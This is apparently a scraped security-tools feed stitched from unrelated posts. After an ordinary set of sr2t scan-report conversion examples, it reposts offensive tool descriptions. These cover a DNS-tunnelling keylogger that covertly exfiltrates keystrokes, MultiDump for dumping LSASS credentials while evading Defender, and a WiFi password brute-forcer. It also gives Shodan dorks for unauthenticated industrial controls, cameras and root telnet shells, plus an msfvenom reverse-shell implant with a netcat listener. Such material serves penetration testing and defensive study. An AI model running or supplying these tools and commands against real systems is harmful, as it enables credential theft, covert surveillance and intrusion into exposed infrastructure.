host,port,plugin id,plugin name,severity,annotations,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X,3389,45411,SSL Certificate with Wrong Hostname,2,X,443,45411,SSL Certificate with Wrong Hostname,2,X,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X,3389,57582,SSL Self-Signed Certificate,2,X,3389,51192,SSL Certificate Cannot Be Trusted,2,X,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X,3389,45411,SSL Certificate with Wrong Hostname,2,X,443,45411,SSL Certificate with Wrong Hostname,2,X,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X,3389,57582,SSL Self-Signed Certificate,2,X,3389,51192,SSL Certificate Cannot Be Trusted,2,X,44 5,57608,SMB Signing not required,2,X


To produce an XLSX format:

$ sr2t --nmap example/nmap.xml -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --nmap example/nmap.xml --nmap-services
Nmap TCP:
| | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
| | X | | X | X | X | X | X | X | | |
| | | | | X | X | | X | X | X | X |
| | | | | X | X | | X | X | X | X |
| | | X | | | | | | | | |
| | | | | X | X | | X | X | X | X |

Nmap Services:
| ip address | port | proto | service | state |
+--------------- --+------+-------+---------------+-------+
| | 53 | tcp | domain | open |
| | 88 | tcp | kerberos-sec | open |
| | 135 | tcp | msrpc | open |
| | 139 | tcp | netbios-ssn | open |
| | 389 | tcp | ldap | open |
| | 445 | tcp | microsoft-ds | open |
| | 3389 | tcp | ms-wbt-server | open |
| | 135 | tcp | msrpc | open |
| | 139 | tcp | netbios-ssn | open |
| | 445 | tcp | microsoft-ds | open |
| | 3389 | tcp | ms-wbt-server | open |
| | 5800 | tcp | vnc-http | open |
| | 5900 | tcp | vnc | open |
| | 135 | tcp | msrpc | open |
| | 139 | tcp | netbios-ssn | open |
| 192 .168.99.164 | 445 | tcp | microsoft-ds | open |
| | 3389 | tcp | ms-wbt-server | open |
| | 5800 | tcp | vnc-http | open |
| | 5900 | tcp | vnc | open |
| | 80 | tcp | http | open |
| | 135 | tcp | msrpc | open |
| | 139 | tcp | netbios-ssn | open |
| | 445 | tcp | microsoft-ds | open |
| | 3389 | tcp | ms-wbt-server | open |
| | 5800 | tcp | vnc-http | open |
| | 5900 | tcp | vnc | open |

Or to output a CSV file:

$ sr2t --nmap example/nmap.xml -oC example
$ cat example_nmap_tcp.csv
ip address,53,80,88,135,139,389,445,3389,5800,5900,X,,X,X,X,X,X,X,,,,,,X,X,,X,X,X,X,,,,X,X,,X,X,X,X,,X,,,,,,,,,,,,X,X,,X,X,X,X


To produce an XLSX format:

$ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx

To produce an text tabular format to stdout:

$ sr2t --nikto example/nikto.xml
| target ip | target hostname | target port | description | annotations |
| | | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |
| | | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |
| | | | agent to protect against some forms of XSS | |
| | | 8 0 | The X-Content-Type-Options header is not set. This could allow the user agent to | X |
| | | | render the content of the site in a different fashion to the MIME type | |

Or to output a CSV file:

$ sr2t --nikto example/nikto.xml -oC example
$ cat example_nikto.csv
target ip,target hostname,target port,description,annotations,,80,The anti-clickjacking X-Frame-Options header is not present.,X,,80,"The X-XSS-Protection header is not defined. This header can hint to the user
agent to protect against some forms of XSS",X,,80,"The X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type",X


To produce an XLSX format:

$ sr2t --dirble example/dirble.xml -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --dirble example/dirble.xml
| url | code | content len | is directory | is listable | found from listable | redirect url | annotations |
| | 0 | 0 | false | false | false | | X |
| | 0 | 0 | false | false | false | | X |
| | 0 | 0 | false | false | false | | X |
| | 0 | 0 | false | false | fa lse | | X |
| | 0 | 0 | false | false | false | | X |
| | 0 | 0 | false | false | false | | X |

Or to output a CSV file:

$ sr2t --dirble example/dirble.xml -oC example
$ cat example_dirble.csv
url,code,content len,is directory,is listable,found from listable,redirect url,annotations,0,0,false,false,false,,X,0,0,false,false,false,,X,0,0,false,false,false,,X,0,0,false,false,false,,X,0,0,false,false,false,,X,0,0,false,false,false,,X


To produce an XLSX format:

$ sr2t --testssl example/testssl.json -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --testssl example/testssl.json
| ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
| | 443 | X | X | X | X | X | X | X | X |

Or to output a CSV file:

$ sr2t --testssl example/testssl.json -oC example
$ cat example_testssl.csv
ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard,443,X,X,X,X,X,X,X,X


To produce an XLSX format:

$ sr2t --fortify example/fortify.fpr -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --fortify example/fortify.fpr
| | type | subtype | severity | confidence | annotations |
| example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example5/web.xml:166:166 | J2EE Misconfiguration | Inse cure Transport | 3.0 | 5.0 | X |
| example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |
| example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |

Or to output a CSV file:

$ sr2t --fortify example/fortify.fpr -oC example
$ cat example_fortify.csv
example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X
example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X


  • WOW: WW4L3VCX11zWgKPX51TRw2RENe8STkbCkh5wTV4GuQnbZ1fKYmPFobZhEfS1G9G3vwjBhzioi3vx8JgBx2xLxe4N1gtJee8Mp

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DNS-Tunnel-Keylogger - Keylogging Server And Client That Uses DNS Tunneling/Exfiltration To Transmit Keystrokes

By: Zion3R — March 21st 2024 at 11:30

This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.

These tools excel at lightweight exfiltration and persistence, properties which will prevent detection. It uses DNS tunelling/exfiltration to bypass firewalls and avoid detection.



The server uses python3.

To install dependencies, run python3 -m pip install -r requirements.txt

Starting the Server

To start the server, run python3

usage: dns exfiltration server [-h] [-p PORT] ip domain

positional arguments:

-h, --help show this help message and exit
-p PORT, --port PORT port to listen on

By default, the server listens on UDP port 53. Use the -p flag to specify a different port.

ip is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.

domain is the domain to listen for, which should be the domain that the server is authoritative for.


On the registrar, you want to change your domain's namespace to custom DNS.

Point them to two domains, and

Add records that make point the namespace domains to your exfiltration server's IP address.

This is the same as setting glue records.



The Linux keylogger is two bash scripts. is used by the script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the script. It will automatically establish a connection and send the data.

# Usage: [-options] domain
# Positional Arguments:
# domain: the domain to send data to
# Options:
# -p path: give path to log file to listen to
# -l: run the logger with warnings and errors printed

To start the keylogger, run the command ./ [domain] && exit. This will silently start the keylogger, and any inputs typed will be sent. The && exit at the end will cause the shell to close on exit. Without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null to display error messages.

The -p option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/.

The -l option will show warnings and errors. Can be useful for debugging. and must be in the same directory for the keylogger to work. If you want persistance, you can add the command to .profile to start on every new interactive shell.

Usage: command [-options] domain
Positional Arguments:
domain: the domain to send data to
-n: number of characters to store before sending a packet



To build keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output to a file named logger.exe in the build directory.

make production

You can also choose to build the program with debugging by making the debug target.

make debug

For both targets, you will need to specify the domain the server is listening for.

Sending Test Requests

You can use dig to send requests to the server:

dig @ A +short send a connection request to a server on localhost.

dig @ A +short send a test message to localhost.

Replace with the domain the server is listening for.


Starting a Connection

A record requests starting with a indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.

The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].

The server will respond with an IP address in following format: 123.123.123.[id]

Concurrent connections cannot exceed 254, and clients are never considered "disconnected."

Exfiltrating Data

A record requests starting with b indicate exfiltrated data being sent to the server.

The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].

The server will respond with [code].123.123.123

id is the id that was established on connection. Data is sent as ASCII encoded in hex.

code is one of the codes described below.

Response Codes

200: OK

If the client sends a request that is processed normally, the server will respond with code 200.

201: Malformed Record Requests

If the client sends an malformed record request, the server will respond with code 201.

202: Non-Existant Connections

If the client sends a data packet with an id greater than the # of connections, the server will respond with code 202.

203: Out of Order Packets

If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.

204 Reached Max Connection

If the client attempts to create a connection when the max has reached, the server will respond with code 204.

Dropped Packets

Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.

Side Notes


Log File

The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, you should select the appropriate option to print ASCII control characters, such as -v for cat, or open it in a text-editor.

Non-Interactive Shells

The keylogger relies on script, so the keylogger won't run in non-interactive shells.


Repeated Requests

For some reason, the Windows Dns_Query_A always sends duplicate requests. The server will process it fine because it discards repeated packets.

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MultiDump - Post-Exploitation Tool For Dumping And Extracting LSASS Memory Discreetly

By: Zion3R — March 20th 2024 at 11:30

MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.

Blog post:

MultiDump supports LSASS dump via ProcDump.exe or comsvc.dll, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.


    __  __       _ _   _ _____
| \/ |_ _| | |_(_) __ \ _ _ _ __ ___ _ __
| |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \
| | | | |_| | | |_| | |__| | |_| | | | | | | |_) |
|_| |_|\__,_|_|\__|_|_____/ \__,_|_| |_| |_| .__/

Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]

-p Path to save procdump.exe, use full path. Default to temp directory
-l Path to save encrypted dump file, use full path. Default to current directory
-r Set ip:port to connect to a remote handler
--procdump Writes procdump to disk and use it to dump LSASS
--nodump Disable LSASS dumping
--reg Dump SAM, SECURITY and SYSTEM hives
--delay Increase interval between connections to for slower network speeds
-v Enable v erbose mode

MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory.
MultiDump.exe -l C:\Users\Public\lsass.dmp -v
MultiDump.exe --procdump -p C:\Tools\procdump.exe -r
usage: [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]

Handler for RemoteProcDump

-h, --help show this help message and exit
-r REMOTE, --remote REMOTE
Port to receive remote dump file
-l LOCAL, --local LOCAL
Local dump file, key needed to decrypt
--sam SAM Local SAM save, key needed to decrypt
--security SECURITY Local SECURITY save, key needed to decrypt
--system SYSTEM Local SYSTEM save, key needed to decrypt
-k KEY, --key KEY Key to decrypt local file
--override-ip OVERRIDE_IP
Manually specify the IP address for key generation in remote mode, for proxied connection

As with all LSASS related tools, Administrator/SeDebugPrivilege priviledges are required.

The handler depends on Pypykatz to parse the LSASS dump, and impacket to parse the registry saves. They should be installed in your enviroment. If you see the error All detection methods failed, it's likely the Pypykatz version is outdated.

By default, MultiDump uses the Comsvc.dll method and saves the encrypted dump in the current directory.

[i] Local Mode Selected. Writing Encrypted Dump File to Disk...
[i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
[i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
./ -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e

If --procdump is used, ProcDump.exe will be writtern to disk to dump LSASS.

In remote mode, MultiDump connects to the handler's listener.

./ -r 9001
[i] Listening on port 9001 for encrypted key...
MultiDump.exe -r

The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.

An additional option to dump the SAM, SECURITY and SYSTEM hives are available with --reg, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.

Building MultiDump

Open in Visual Studio, build in Release mode.

Customising MultiDump

It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them, to do so, another Visual Studio project EncryptionHelper, is included. Simply change the key or strings and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.

Self deletion can be toggled by uncommenting the following line in Common.h:


To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h:

//#define DEBUG

MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of), the investigation and implementation deserves a blog post itself:


☐ ☆ ✇ KitPloit - PenTest Tools!

Shodan Dorks

By: Zion3R — March 18th 2024 at 11:30

Shodan Dorks by

Feel free to make suggestions

Shodan Dorks

Basic Shodan Filters


Find devices in a particular city. city:"Bangalore"


Find devices in a particular country. country:"IN"


Find devices by giving geographical coordinates. geo:"56.913055,118.250862"


country:us country:ru country:de city:chicago


Find devices matching the hostname. server: "gws" hostname:"google",


Find devices based on an IP address or /x CIDR. net:


org:microsoft org:"United States Department"

Autonomous System Number (ASN)



Find devices based on operating system. os:"windows 7"


Find devices based on open ports. proftpd port:21


Find devices before or after between a given time. apache after:22/02/2009 before:14/3/2010

SSL/TLS Certificates

Self signed certificates

Expired certificates ssl.cert.expired:true

Device Type

device:firewall device:router device:wap device:webcam device:media device:"broadband router" device:pbx device:printer device:switch device:storage device:specialized device:phone device:"voip" device:"voip phone" device:"voip adaptor" device:"load balancer" device:"print server" device:terminal device:remote device:telecom device:power device:proxy device:pda device:bridge

Operating System

os:"windows 7" os:"windows server 2012" os:"linux 3.x"


product:apache product:nginx product:android product:chromecast

Customer Premises Equipment (CPE)

cpe:apple cpe:microsoft cpe:nginx cpe:cisco


server: nginx server: apache server: microsoft server: cisco-ios

ssh fingerprints



Pulse Secure


PEM Certificates

http.title:"Index of /" http.html:".pem"

Tor / Dark Web sites




"product:MySQL" mysql port:"3306"


"product:MongoDB" mongodb port:27017

Fully open MongoDBs

"MongoDB Server Information { "metrics":" "Set-Cookie: mongo-express=" "200 OK" "MongoDB Server Information" port:27017 -authentication

Kibana dashboards without authentication

kibana content-legth:217


port:9200 json port:"9200" all:elastic port:"9200" all:"elastic indices"




"product:CouchDB" port:"5984"+Server: "CouchDB/2.1.0"


"port:5432 PostgreSQL"


"port:8087 Riak"





Industrial Control Systems

Samsung Electronic Billboards

"Server: Prismview Player"

Gas Station Pump Controllers

"in-tank inventory" port:10001

Fuel Pumps connected to internet:

No auth required to access CLI terminal. "privileged command" GET

Automatic License Plate Readers

P372 "ANPR enabled"

Traffic Light Controllers / Red Light Cameras

mikrotik streetlight

Voting Machines in the United States

"voter system serial" country:US

Open ATM:

May allow for ATM Access availability NCR Port:"161"

Telcos Running Cisco Lawful Intercept Wiretaps


Prison Pay Phones

"[2J[H Encartele Confidential"

Tesla PowerPack Charging Status

http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

Electric Vehicle Chargers

"Server: gSOAP/2.8" "Content-Length: 583"

Maritime Satellites

Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!

"Cobham SATCOM" OR ("Sailor" "VSAT")

Submarine Mission Control Dashboards

title:"Slocum Fleet Mission Control"

CAREL PlantVisor Refrigeration Units

"Server: CarelDataServer" "200 Document follows"

Nordex Wind Turbine Farms

http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"

C4 Max Commercial Vehicle GPS Trackers

"[1m[35mWelcome on console"

DICOM Medical X-Ray Machines

Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.

"DICOM Server Response" port:104

GaugeTech Electricity Meters

"Server: EIG Embedded Web Server" "200 Document follows"

Siemens Industrial Automation

"Siemens, SIMATIC" port:161

Siemens HVAC Controllers

"Server: Microsoft-WinCE" "Content-Length: 12581"

Door / Lock Access Controllers

"HID VertX" port:4070

Railroad Management

"log off" "select the appropriate"

Tesla Powerpack charging Status:

Helps to find the charging status of tesla powerpack. http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

XZERES Wind Turbine

title:"xzeres wind"

PIPS Automated License Plate Reader

"html:"PIPS Technology ALPR Processors""



Niagara Fox

"port:1911,4911 product:Niagara"


"port:18245,18246 product:"general electric""


"port:5006,5007 product:mitsubishi"


"port:2455 operating system"






"port:5094 hart-ip"

Omron FINS

"port:9600 response code"

IEC 60870-5-104

"port:2404 asdu address"


"port:20000 source address"




"port:1962 PLC"

Crimson v3.0

"port:789 product:"Red Lion Controls"


"port:20547 PLC"

Remote Desktop

Unprotected VNC

"authentication disabled" port:5900,5901 "authentication disabled" "RFB 003.008"

Windows RDP

99.99% are secured by a secondary Windows login screen.


C2 Infrastructure

CobaltStrike Servers

product:"cobalt strike team server" product:"Cobalt Strike Beacon" ssl.cert.serial:146473198 - default certificate serial number ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1 ssl:foren.zik

Brute Ratel

http.html_hash:-1957161625 product:"Brute Ratel C4"


ssl:"Covenant" http.component:"Blazor"



Network Infrastructure

Hacked routers:

Routers which got compromised hacked-router-help-sos

Redis open instances

product:"Redis key-value store"


Find Citrix Gateway. title:"citrix gateway"

Weave Scope Dashboards

Command-line access inside Kubernetes pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.

title:"Weave Scope" http.favicon.hash:567176827

Jenkins CI

"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"


Jenkins Unrestricted Dashboard x-jenkins 200

Docker APIs

"Docker Containers:" port:2375

Docker Private Registries

"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab

Pi-hole Open DNS Servers

"dnsmasq-pi-hole" "Recursion: enabled"

DNS Servers with recursion

"port: 53" Recursion: Enabled

Already Logged-In as root via Telnet

"root@" port:23 -login -password -name -Session

Telnet Access:

NO password required for telnet access. port:23 console gateway

Polycom video-conference system no-auth shell

"polycom command shell"

NPort serial-to-eth / MoCA devices without password

nport -keyin port:23

Android Root Bridges

A tangential result of Google's sloppy fractured update approach. 🙄 More information here.

"Android Debug Bridge" "Device" port:5555

Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords

Lantronix password port:30718 -secured

Citrix Virtual Apps

"Citrix Applications:" port:1604

Cisco Smart Install

Vulnerable (kind of "by design," but especially when exposed).

"smart install client active"

PBX IP Phone Gateways

PBX "gateway console" -password port:23

Polycom Video Conferencing

http.title:"- Polycom" "Server: lighttpd" "Polycom Command Shell" -failed port:23

Telnet Configuration:

"Polycom Command Shell" -failed port:23

Example: Polycom Video Conferencing

Bomgar Help Desk Portal

"Server: Bomgar" "200 OK"

Intel Active Management CVE-2017-5689

"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995 "Active Management Technology"

HP iLO 4 CVE-2017-12542

HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900

Lantronix ethernet adapter's admin interface without password

"Press Enter for Setup Mode port:9999"

Wifi Passwords:

Helps to find the cleartext wifi passwords in Shodan. html:"def_wirelesspassword"

Misconfigured Wordpress Sites:

The wp-config.php if accessed can give out the database credentials. http.html:"* The wp-config.php creation script uses this file"

Outlook Web Access:

Exchange 2007

"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"

Exchange 2010

"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392

Exchange 2013 / 2016

"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"

Lync / Skype for Business


Network Attached Storage (NAS)

SMB (Samba) File Shares

Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.

"Authentication: disabled" port:445

Specifically domain controllers:

"Authentication: disabled" NETLOGON SYSVOL -unix port:445

Concerning default network shares of QuickBooks files:

"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445

FTP Servers with Anonymous Login

"220" "230 Login successful." port:21

Iomega / LenovoEMC NAS Drives

"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"

Buffalo TeraStation NAS Drives

Redirecting sencha port:9000

Logitech Media Servers

"Server: Logitech Media Server" "200 OK"

Example: Logitech Media Servers

Plex Media Servers

"X-Plex-Protocol" "200 OK" port:32400

Tautulli / PlexPy Dashboards

"CherryPy/5.1.0" "/home"

Home router attached USB

"IPC$ all storage devices"


Generic camera search


Webcams with screenshots

webcam has_screenshot:true

D-Link webcams

"d-Link Internet Camera, 200 OK"


"Hipcam RealServer/V1.0"


"Server: yawcam" "Mime-Type: text/html"


("webcam 7" OR "webcamXP") http.component:"mootools" -401

Android IP Webcam Server

"Server: IP Webcam Server" "200 OK"

Security DVRs

html:"DVR_H264 ActiveX"

Surveillance Cams:

With username:admin and password: :P NETSurveillance uc-httpd Server: uc-httpd 1.0.0

Printers & Copiers:

HP Printers

"Serial Number:" "Built:" "Server: HP HTTP"

Xerox Copiers/Printers

ssl:"Xerox Generic Root"

Epson Printers

"SERVER: EPSON_Linux UPnP" "200 OK"

"Server: EPSON-HTTP" "200 OK"

Canon Printers

"Server: KS_HTTP" "200 OK"

"Server: CANON HTTP Server"

Home Devices

Yamaha Stereos

"Server: AV_Receiver" "HTTP/1.1 406"

Apple AirPlay Receivers

Apple TVs, HomePods, etc.

"\x08_airplay" port:5353

Chromecasts / Smart TVs

"Chromecast:" port:8008

Crestron Smart Home Controllers

"Model: PYNG-HUB"

Random Stuff

Calibre libraries

"Server: calibre" http.status:200 http.title:calibre

OctoPrint 3D Printer Controllers

title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944

Etherium Miners

"ETH - Total speed"

Apache Directory Listings

Substitute .pem with any extension or a filename like phpinfo.php.

http.title:"Index of /" http.html:".pem"

Misconfigured WordPress

Exposed wp-config.php files containing database credentials.

http.html:"* The wp-config.php creation script uses this file"

Too Many Minecraft Servers

"Minecraft Server" "protocol 340" port:25565

Literally Everything in North Korea


☐ ☆ ✇ The Hacker News

DarkGate Malware Exploited Recently Patched Microsoft Flaw in Zero-Day Attack

By: Newsroom — March 14th 2024 at 04:57
A DarkGate malware campaign observed in mid-January 2024 leveraged a recently patched security flaw in Microsoft Windows as a zero-day using bogus software installers. “During this campaign, users were lured using PDFs that contained Google DoubleClick Digital Marketing (DDM) open redirects that led unsuspecting victims to compromised sites hosting the Microsoft Windows SmartScreen bypass CVE-
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Gtfocli - GTFO Command Line Interface For Easy Binaries Search Commands That Can Be Used To Bypass Local Security Restrictions In Misconfigured Systems

By: Zion3R — March 12th 2024 at 23:38

GTFOcli it's a Command Line Interface for easy binaries search commands that can be used to bypass local security restrictions in misconfigured systems.


Using go:

go install

Using homebrew:

brew tap cmd-tools/homebrew-tap
brew install gtfocli

Using docker:

docker pull cmdtoolsowner/gtfocli


Search for unix binaries

Search for binary tar:

gtfocli search tar

Search for binary tar from stdin:

echo "tar" | gtfocli search

Search for binaries located into file;

cat myBinaryList.txt

gtfocli search -f myBinaryList.txt

Search for windows binaries

Search for binary Winget.exe:

gtfocli search Winget --os windows

Search for binary Winget from stdin:

echo "Winget" | gtfocli search --os windows

Search for binaries located into file:

cat windowsExecutableList.txt

gtfocli search -f windowsExecutableList.txt --os windows

Search for binary Winget and print output in yaml format (see -h for available formats):

gtfocli search Winget -o yaml --os windows

Search using dockerized solution


Search for binary Winget and print output in yaml format:

docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows

Search for binary tar and print output in json format:

echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json

Search for binaries located into file mounted as volume in the container:

cat myBinaryList.txt

docker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt


An example of common use case for gtfocli is together with find:

find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null


find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search


Thanks to GTFOBins and LOLBAS, without these projects gtfocli would never have come to light.


You want to contribute to this project? Wow, thanks! So please just fork it and send a pull request.

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WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies

By: Zion3R — March 7th 2024 at 11:30

WinFiHack is a recreational attempt by me to rewrite my previous project Brute-Hacking-Framework's main wifi hacking script that uses netsh and native Windows scripts to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack but it needs no external libraries and just Python and python scripts.


The packages are minimal or nearly none 😅. The package install command is:

pip install rich pyfiglet

Thats it.


So listing the features:

  • Overall Features:
  • We can use custom interfaces or non-default interfaces to run the attack.
  • Well-defined way of using netsh and listing and utilizing targets.
  • Upgradeability
  • Code-Wise Features:
  • Interactive menu-driven system with rich.
  • versatility in using interface, targets, and password files.

How it works

So this is how the bruteforcer works:

  • Provide Interface:

  • The user is required to provide the network interface for the tool to use.

  • By default, the interface is set to Wi-Fi.

  • Search and Set Target:

  • The user must search for and select the target network.

  • During this process, the tool performs the following sub-steps:

    • Disconnects all active network connections for the selected interface.
    • Searches for all available networks within range.
  • Input Password File:

  • The user inputs the path to the password file.

  • The default path for the password file is ./wordlist/default.txt.

  • Run the Attack:

  • With the target set and the password file ready, the tool is now prepared to initiate the attack.

  • Attack Procedure:

  • The attack involves iterating through each password in the provided file.
  • For each password, the following steps are taken:
    • A custom XML configuration for the connection attempt is generated and stored.
    • The tool attempts to connect to the target network using the generated XML and the current password.
    • To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.
    • If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.
    • This loop continues until a successful ping response is received, indicating a successful connection attempt.

How to run this

After installing all the packages just run python rest is history 👍 make sure you run this on Windows cause this won't work on any other OS. The interface looks like this:



For contributions: - First Clone: First Clone the repo into your dev env and do the edits. - Comments: I would apprtiate if you could add comments explaining your POV and also explaining the upgrade. - Submit: Submit a PR for me to verify the changes and apprive it if necessary.

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RKS - A Script To Automate Keystrokes Through A Graphical Desktop Program

By: Zion3R — March 1st 2024 at 11:30

A script to automate keystrokes through an active remote desktop session that assists offensive operators in combination with living off the land techniques.

About RKS (RemoteKeyStrokes)

All credits goes to nopernik for making it possible so I took it upon myself to improve it. I wanted something that helps during the post exploitation phase when executing commands through a remote desktop.

Help Menu
$ ./ -h
Usage: ./ (RemoteKeyStrokes)
-c, --command <command | cmdfile> Specify a command or a file containing to execute
-i, --input <input_file> Specify the local input file to transfer
-o, --output <output_file> Specify the remote output file to transfer
-m, --method <method> Specify the file transfer or execution method
(For file transfer "base64" is set by default if
not specified. For execution method "none" is set
by default if not specified)

-p, --platform <operating_system> Specify the operating system (windows is set by
default if not specified)

-w, --windowname <name> Specify t he window name for graphical remote
program (freerdp is set by default if not

-h, --help Display this help message


Internal Reconnaissance
  • When running in command prompt
$ cat recon_cmds.txt
whoami /all
net user
net localgroup Administrators
net user /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Computers" /domain

$ ./rks.h -c recon_cmds.txt

Execute Implant
  • Execute an implant while reading the contents of the payload in powershell.
$ msfvenom -p windowx/x64/shell_reverse_tcp lhost=<IP> lport=4444 -f psh -o implant.ps1

$ ./ -c implant.ps1

$ nc -lvnp 4444

File Transfer
  • Transfer a file remotely when pivoting in a isolated network. If you want to specify the remote path on windows be sure to include quotes.
